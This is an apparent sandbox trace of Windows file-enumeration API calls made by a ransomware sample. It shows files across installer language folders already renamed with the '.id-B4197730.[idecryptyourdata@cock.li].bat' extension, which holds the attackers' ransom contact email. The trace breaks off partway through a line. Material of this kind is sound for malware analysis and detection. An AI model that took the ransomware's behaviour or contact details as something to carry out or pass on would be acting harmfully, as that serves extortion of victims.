FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName=".", cAlternateFileName="")) returned 0x6ba130 [0155.301] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x4480692, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="..", cAlternateFileName="")) returned 1 [0155.301] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1025", cAlternateFileName="")) returned 1 [0155.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.302] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x6ba1f0 [0155.302] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.302] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd21ec45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.302] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd26b034, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd26b034, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd2b75a2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x122e6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.303] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd02ed55, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.303] FindNextFileW (in: hFindFile=0x6ba1f0, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfcf49f2d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfcf49f2d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd02ed55, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.303] FindClose (in: hFindFile=0x6ba1f0 | out: hFindFile=0x6ba1f0) returned 1 [0155.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.303] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1028", cAlternateFileName="")) returned 1 [0155.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.304] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727d48 [0155.523] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.523] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd291354, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd291354, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd291354, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.523] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd291354, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd291354, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd291354, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.523] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.523] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd008b26, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd008b26, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.523] FindClose (in: hFindFile=0x727d48 | out: hFindFile=0x727d48) returned 1 [0155.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.524] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1029", cAlternateFileName="")) returned 1 [0155.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.524] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727508 [0155.526] FindNextFileW (in: hFindFile=0x727508, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.526] FindNextFileW (in: hFindFile=0x727508, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd34fddd, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd34fddd, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd34fddd, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.526] FindNextFileW (in: hFindFile=0x727508, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd2ddad2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd2ddad2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd303946, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13d46, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.526] FindNextFileW (in: hFindFile=0x727508, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.526] FindNextFileW (in: hFindFile=0x727508, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd02ed55, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd02ed55, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd054faf, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.526] FindClose (in: hFindFile=0x727508 | out: hFindFile=0x727508) returned 1 [0155.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.527] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1030", cAlternateFileName="")) returned 1 [0155.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.528] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728288 [0155.531] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.531] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd303946, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd303946, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd303946, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.531] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd329be4, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd329be4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd329be4, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x130b6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.531] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd054faf, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd054faf, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd434d45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.531] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd054faf, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd054faf, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd434d45, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.531] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0155.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.532] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1031", cAlternateFileName="")) returned 1 [0155.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.532] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727dc8 [0155.535] FindNextFileW (in: hFindFile=0x727dc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.535] FindNextFileW (in: hFindFile=0x727dc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd329be4, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd329be4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8870a3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.535] FindNextFileW (in: hFindFile=0x727dc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd34fddd, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd34fddd, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd383175, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x142a6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.535] FindNextFileW (in: hFindFile=0x727dc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0a1541, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.535] FindNextFileW (in: hFindFile=0x727dc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0a1541, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.535] FindClose (in: hFindFile=0x727dc8 | out: hFindFile=0x727dc8) returned 1 [0155.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.536] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1032", cAlternateFileName="")) returned 1 [0155.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.536] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728388 [0155.538] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.539] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.539] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4a74ae, 